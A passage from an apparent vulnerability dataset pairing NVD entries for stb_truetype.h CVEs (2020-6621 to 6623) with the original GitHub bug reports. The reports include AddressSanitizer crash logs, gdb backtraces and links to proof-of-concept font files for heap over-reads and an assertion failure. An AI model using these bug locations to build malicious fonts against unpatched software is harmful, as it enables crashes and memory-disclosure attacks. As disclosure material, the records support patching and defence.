(/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x41ad49 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x41ad49) Address 0x625000002810 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e639a) Shadow bytes around the buggy address: 0x0c4a7fff84b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff84c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff84d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff84e0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c4a7fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c4a7fff8500: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a7fff8550: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==60039==ABORTING Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x73be28 --> 0x0 RCX: 0x7ffff6e41e97 (<__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffc710 --> 0x0 RDI: 0x2 RBP: 0x7fffffffd6a0 --> 0x7fffffffd6d0 --> 0x7fffffffd740 --> 0x7fffffffd770 --> 0x7fffffffd8d0 --> 0x7fffffffe120 (--> ...) RSP: 0x7fffffffc710 --> 0x0 RIP: 0x7ffff6e41e97 (<__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffc710 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7fffffffd6d0 --> 0x7fffffffd740 --> 0x7fffffffd770 --> 0x7fffffffd8d0 --> 0x7fffffffe120 --> 0x7fffffffe150 (--> ...) R13: 0x7fffffffd6c8 --> 0x7fffffffd948 --> 0x2700000027 --> 0x0 R14: 0x7fffffffd670 --> 0xffffffc6000001ba R15: 0x7ce288 --> 0x1 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff6e41e8b <__GI_raise+187>: mov edi,0x2 0x7ffff6e41e90 <__GI_raise+192>: mov eax,0xe 0x7ffff6e41e95 <__GI_raise+197>: syscall => 0x7ffff6e41e97 <__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108] 0x7ffff6e41e9f <__GI_raise+207>: xor rcx,QWORD PTR fs:0x28 0x7ffff6e41ea8 <__GI_raise+216>: mov eax,r8d 0x7ffff6e41eab <__GI_raise+219>: jne 0x7ffff6e41ecc <__GI_raise+252> 0x7ffff6e41ead <__GI_raise+221>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffc710 --> 0x0 0008| 0x7fffffffc718 --> 0x7fffffffe118 --> 0x0 0016| 0x7fffffffc720 --> 0x940000c600006100 0024| 0x7fffffffc728 --> 0x1008e0000dd0000 0032| 0x7fffffffc730 --> 0x0 0040| 0x7fffffffc738 --> 0x0 0048| 0x7fffffffc740 --> 0x0 0056| 0x7fffffffc748 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6e43801 in __GI_abort () at abort.c:79 #2 0x00000000004b0707 in __sanitizer::Abort() () at /tmp/final/llvm.src/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix_libcdep.cc:154 #3 0x00000000004af0e1 in __sanitizer::Die() () at /tmp/final/llvm.src/projects/compiler-rt/lib/sanitizer_common/sanitizer_termination.cc:58 #4 0x0000000000496c69 in ~ScopedInErrorReport () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_report.cc:186 #5 0x00000000004983df in ReportGenericError () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_report.cc:470 #6 0x0000000000498ab8 in __asan_report_load1 () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_rtl.cc:117 #7 0x00000000004e639b in stbtt__buf_get8 (b=0x7fffffffd920) at ./SRC/stb_truetype.h:1105 #8 0x00000000004e7ad1 in stbtt__buf_get (b=0x7fffffffd920, n=0x2) at ./SRC/stb_truetype.h:1132 #9 0x00000000004e9f66 in stbtt__cff_get_index (b=0x7fffffffd920) at ./SRC/stb_truetype.h:1162 #10 0x00000000004e10a5 in stbtt_InitFont_internal (info=0x7fffffffe180, data=0x625000000100 "OTTO", fontstart=0x0) at ./SRC/stb_truetype.h:1405 #11 0x00000000004d71a3 in stbtt_InitFont (info=0x7fffffffe180, data=0x625000000100 "OTTO", offset=0x0) at ./SRC/stb_truetype.h:4771 #12 0x00000000004e1b29 in main (argc=0x2, argv=0x7fffffffe428) at ../fuzzsrc/ttfuzz.c:29 #13 0x00007ffff6e24b97 in __libc_start_main (main=0x4e18f0 <main>, argc=0x2, argv=0x7fffffffe428, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe418) at ../csu/libc-start.c:310 #14 0x000000000041ad4a in _start () ```
heap overflow in stbtt__buf_get8 in stb_truetype.h
https://api.github.com/repos/nothings/stb/issues/868/comments
2
2020-01-06T11:29:19Z
2021-07-04T10:07:29Z
https://github.com/nothings/stb/issues/868
545,680,359
868
994
CVE-2020-6621
2020-01-08T23:15:10.677
stb stb_truetype.h through 1.22 has a heap-based buffer over-read in ttUSHORT.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/867" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/867" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:*:*:*:*:*:*:*:*", "matchCriteriaId": "1CD78C93-4049-4174-B364-1D3843DE443F", "versionEndExcluding": null, "versionEndIncluding": "1.22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/nothings/stb/issues/867
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
`ttUSHORT` don't have any bound check, so heap overflow can be triggered. <img width="772" alt="souce0" src="https://user-images.githubusercontent.com/20929895/71815428-654fcb80-30ba-11ea-82f1-9749f205bc7b.png"> <img width="613" alt="source1" src="https://user-images.githubusercontent.com/20929895/71815431-67198f00-30ba-11ea-8bb7-9bd8c10bd683.png"> poc: [poc.zip](https://github.com/nothings/stb/files/4025839/poc.zip) result: ``` ================================================================= ==59598==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000004dc at pc 0x0000004c2b5b bp 0x7fffffffd890 sp 0x7fffffffd888 READ of size 1 at 0x6190000004dc thread T0 #0 0x4c2b5a (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4c2b5a) #1 0x4e13c0 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e13c0) #2 0x4d71a2 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4d71a2) #3 0x4e1b28 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e1b28) #4 0x7ffff6e24b96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x41ad49 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x41ad49) 0x6190000004dc is located 4 bytes to the right of 1112-byte region [0x619000000080,0x6190000004d8) allocated by thread T0 here: #0 0x492c4d (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x492c4d) #1 0x4e1ac8 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e1ac8) #2 0x7ffff6e24b96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4c2b5a) Shadow bytes around the buggy address: 0x0c327fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8090: 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa 0x0c327fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==59598==ABORTING Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x73be28 --> 0x0 RCX: 0x7ffff6e41e97 (<__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffc8d0 --> 0x0 RDI: 0x2 RBP: 0x7fffffffd860 --> 0x7fffffffd890 --> 0x7fffffffd8d0 --> 0x7fffffffe120 --> 0x7fffffffe150 --> 0x7fffffffe340 (--> ...) RSP: 0x7fffffffc8d0 --> 0x0 RIP: 0x7ffff6e41e97 (<__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffc8d0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7fffffffd890 --> 0x7fffffffd8d0 --> 0x7fffffffe120 --> 0x7fffffffe150 --> 0x7fffffffe340 --> 0x4f3870 (<__libc_csu_init>: push r15) R13: 0x7fffffffd888 --> 0x7fff00000070 R14: 0x7fffffffd830 --> 0x6190000001ef --> 0x3e00070002000000 R15: 0x7ce288 --> 0x1 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff6e41e8b <__GI_raise+187>: mov edi,0x2 0x7ffff6e41e90 <__GI_raise+192>: mov eax,0xe 0x7ffff6e41e95 <__GI_raise+197>: syscall => 0x7ffff6e41e97 <__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108] 0x7ffff6e41e9f <__GI_raise+207>: xor rcx,QWORD PTR fs:0x28 0x7ffff6e41ea8 <__GI_raise+216>: mov eax,r8d 0x7ffff6e41eab <__GI_raise+219>: jne 0x7ffff6e41ecc <__GI_raise+252> 0x7ffff6e41ead <__GI_raise+221>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffc8d0 --> 0x0 0008| 0x7fffffffc8d8 --> 0x7fffffffe118 --> 0x0 0016| 0x7fffffffc8e0 --> 0x3200b5ff 0024| 0x7fffffffc8e8 --> 0x0 0032| 0x7fffffffc8f0 --> 0x0 0040| 0x7fffffffc8f8 --> 0x0 0048| 0x7fffffffc900 --> 0x0 0056| 0x7fffffffc908 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6e43801 in __GI_abort () at abort.c:79 #2 0x00000000004b0707 in __sanitizer::Abort() () at /tmp/final/llvm.src/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix_libcdep.cc:154 #3 0x00000000004af0e1 in __sanitizer::Die() () at /tmp/final/llvm.src/projects/compiler-rt/lib/sanitizer_common/sanitizer_termination.cc:58 #4 0x0000000000496c69 in ~ScopedInErrorReport () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_report.cc:186 #5 0x00000000004983df in ReportGenericError () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_report.cc:470 #6 0x0000000000498ab8 in __asan_report_load1 () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_rtl.cc:117 #7 0x00000000004c2b5b in ttUSHORT (p=0x6190000004dc "") at ./SRC/stb_truetype.h:1254 #8 0x00000000004e13c1 in stbtt_InitFont_internal (info=0x7fffffffe180, data=0x619000000080 "OTTO", fontstart=0x0) at ./SRC/stb_truetype.h:1422 #9 0x00000000004d71a3 in stbtt_InitFont (info=0x7fffffffe180, data=0x619000000080 "OTTO", offset=0x0) at ./SRC/stb_truetype.h:4771 #10 0x00000000004e1b29 in main (argc=0x2, argv=0x7fffffffe428) at ../fuzzsrc/ttfuzz.c:29 #11 0x00007ffff6e24b97 in __libc_start_main (main=0x4e18f0 <main>, argc=0x2, argv=0x7fffffffe428, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe418) at ../csu/libc-start.c:310 #12 0x000000000041ad4a in _start () ```
heap overflow in ttUSHORT in stb_truetype.h
https://api.github.com/repos/nothings/stb/issues/867/comments
2
2020-01-06T11:27:04Z
2021-07-04T10:07:36Z
https://github.com/nothings/stb/issues/867
545,679,506
867
995
CVE-2020-6622
2020-01-08T23:15:10.737
stb stb_truetype.h through 1.22 has a heap-based buffer over-read in stbtt__buf_peek8.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/869" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/869" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:*:*:*:*:*:*:*:*", "matchCriteriaId": "1CD78C93-4049-4174-B364-1D3843DE443F", "versionEndExcluding": null, "versionEndIncluding": "1.22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/nothings/stb/issues/869
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
heap overflow in `stbtt__buf_peek8`. <img width="427" alt="source" src="https://user-images.githubusercontent.com/20929895/71815599-f9219780-30ba-11ea-8b1c-249e637f5aed.png"> poc: [poc.zip](https://github.com/nothings/stb/files/4025847/poc.zip) result: ``` ================================================================= ==26964==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62900000c545 at pc 0x0000004ea862 bp 0x7fffffffd2a0 sp 0x7fffffffd298 READ of size 1 at 0x62900000c545 thread T0 #0 0x4ea861 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4ea861) #1 0x4ea417 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4ea417) #2 0x4e9bc2 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e9bc2) #3 0x4e9768 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e9768) #4 0x4e0aa9 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e0aa9) #5 0x4d71a2 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4d71a2) #6 0x4e1b28 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4e1b28) #7 0x7ffff6e24b96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x41ad49 (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x41ad49) Address 0x62900000c545 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/casper/targets/struct/stb/dbg/fuzzrun/ttfuzz+0x4ea861) Shadow bytes around the buggy address: 0x0c527fff9850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9880: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9890: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c527fff98a0: fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa 0x0c527fff98b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff98c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff98d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff98e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff98f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==26964==ABORTING Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x73be28 --> 0x0 RCX: 0x7ffff6e41e97 (<__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7fffffffc2e0 --> 0x0 RDI: 0x2 RBP: 0x7fffffffd270 --> 0x7fffffffd2a0 --> 0x7fffffffd310 --> 0x7fffffffd490 --> 0x7fffffffd5d0 --> 0x7fffffffd8d0 (--> ...) RSP: 0x7fffffffc2e0 --> 0x0 RIP: 0x7ffff6e41e97 (<__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7fffffffc2e0 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7fffffffd2a0 --> 0x7fffffffd310 --> 0x7fffffffd490 --> 0x7fffffffd5d0 --> 0x7fffffffd8d0 --> 0x7fffffffe120 (--> ...) R13: 0x7fffffffd298 --> 0x7fffffffd1a0 --> 0x45e0360e R14: 0x7fffffffd240 --> 0x7fffffff014c --> 0x0 R15: 0x7ce288 --> 0x1 EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff6e41e8b <__GI_raise+187>: mov edi,0x2 0x7ffff6e41e90 <__GI_raise+192>: mov eax,0xe 0x7ffff6e41e95 <__GI_raise+197>: syscall => 0x7ffff6e41e97 <__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108] 0x7ffff6e41e9f <__GI_raise+207>: xor rcx,QWORD PTR fs:0x28 0x7ffff6e41ea8 <__GI_raise+216>: mov eax,r8d 0x7ffff6e41eab <__GI_raise+219>: jne 0x7ffff6e41ecc <__GI_raise+252> 0x7ffff6e41ead <__GI_raise+221>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffc2e0 --> 0x0 0008| 0x7fffffffc2e8 --> 0x7496836615c70b4b 0016| 0x7fffffffc2f0 --> 0x0 0024| 0x7fffffffc2f8 --> 0x0 0032| 0x7fffffffc300 --> 0x0 0040| 0x7fffffffc308 --> 0x0 0048| 0x7fffffffc310 --> 0x0 0056| 0x7fffffffc318 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6e43801 in __GI_abort () at abort.c:79 #2 0x00000000004b0707 in __sanitizer::Abort() () at /tmp/final/llvm.src/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix_libcdep.cc:154 #3 0x00000000004af0e1 in __sanitizer::Die() () at /tmp/final/llvm.src/projects/compiler-rt/lib/sanitizer_common/sanitizer_termination.cc:58 #4 0x0000000000496c69 in ~ScopedInErrorReport () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_report.cc:186 #5 0x00000000004983df in ReportGenericError () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_report.cc:470 #6 0x0000000000498ab8 in __asan_report_load1 () at /tmp/final/llvm.src/projects/compiler-rt/lib/asan/asan_rtl.cc:117 #7 0x00000000004ea862 in stbtt__buf_peek8 (b=0x7fffffffd690) at ./SRC/stb_truetype.h:1112 #8 0x00000000004ea418 in stbtt__dict_get (b=0x7fffffffd690, key=0x13) at ./SRC/stb_truetype.h:1204 #9 0x00000000004e9bc3 in stbtt__dict_get_ints (b=0x7fffffffd690, key=0x13, outcount=0x1, out=0x7fffffffd660) at ./SRC/stb_truetype.h:1217 #10 0x00000000004e9769 in stbtt__get_subrs (cff=..., fontdict=...) at ./SRC/stb_truetype.h:1329 #11 0x00000000004e0aaa in stbtt_InitFont_internal (info=0x7fffffffe180, data=0x629000000200 "OTTO", fontstart=0x0) at ./SRC/stb_truetype.h:1390 #12 0x00000000004d71a3 in stbtt_InitFont (info=0x7fffffffe180, data=0x629000000200 "OTTO", offset=0x0) at ./SRC/stb_truetype.h:4771 #13 0x00000000004e1b29 in main (argc=0x2, argv=0x7fffffffe428) at ../fuzzsrc/ttfuzz.c:29 #14 0x00007ffff6e24b97 in __libc_start_main (main=0x4e18f0 <main>, argc=0x2, argv=0x7fffffffe428, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe418) at ../csu/libc-start.c:310 #15 0x000000000041ad4a in _start () ```
heap overflow in stbtt__buf_peek8 in stb_truetype.h
https://api.github.com/repos/nothings/stb/issues/869/comments
2
2020-01-06T11:31:13Z
2021-07-04T10:07:23Z
https://github.com/nothings/stb/issues/869
545,681,061
869
996
CVE-2020-6623
2020-01-08T23:15:10.800
stb stb_truetype.h through 1.22 has an assertion failure in stbtt__cff_get_index.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/865" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nothings/stb/issues/865" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nothings:stb_truetype.h:*:*:*:*:*:*:*:*", "matchCriteriaId": "1CD78C93-4049-4174-B364-1D3843DE443F", "versionEndExcluding": null, "versionEndIncluding": "1.22", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/nothings/stb/issues/865
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nothings", "stb" ]
assertion failure in stbtt__cff_get_index can be triggered by user supplied file. <img width="513" alt="source" src="https://user-images.githubusercontent.com/20929895/71815151-8106a200-30b9-11ea-9946-07171227db42.png"> poc: [poc.zip](https://github.com/nothings/stb/files/4025825/poc.zip) result: ``` #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6e43801 in __GI_abort () at abort.c:79 #2 0x00007ffff6e3339a in __assert_fail_base (fmt=0x7ffff6fba7d8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x5060a0 <.str> "offsize >= 1 && offsize <= 4", file=file@entry=0x505b40 <.str> "./SRC/stb_truetype.h", line=line@entry=0x48d, function=function@entry=0x5062c0 <__PRETTY_FUNCTION__.stbtt__cff_get_index> "stbtt__buf stbtt__cff_get_index(stbtt__buf *)") at assert.c:92 #3 0x00007ffff6e33412 in __GI___assert_fail (assertion=0x5060a0 <.str> "offsize >= 1 && offsize <= 4", file=0x505b40 <.str> "./SRC/stb_truetype.h", line=0x48d, function=0x5062c0 <__PRETTY_FUNCTION__.stbtt__cff_get_index> "stbtt__buf stbtt__cff_get_index(stbtt__buf *)") at assert.c:101 #4 0x00000000004e9fda in stbtt__cff_get_index (b=0x7fffffffd960) at ./SRC/stb_truetype.h:1165 #5 0x00000000004e0591 in stbtt_InitFont_internal (info=0x7fffffffe1c0, data=0x629000000200 "OTTO", fontstart=0x0) at ./SRC/stb_truetype.h:1381 #6 0x00000000004d71a3 in stbtt_InitFont (info=0x7fffffffe1c0, data=0x629000000200 "OTTO", offset=0x0) at ./SRC/stb_truetype.h:4771 #7 0x00000000004e1b29 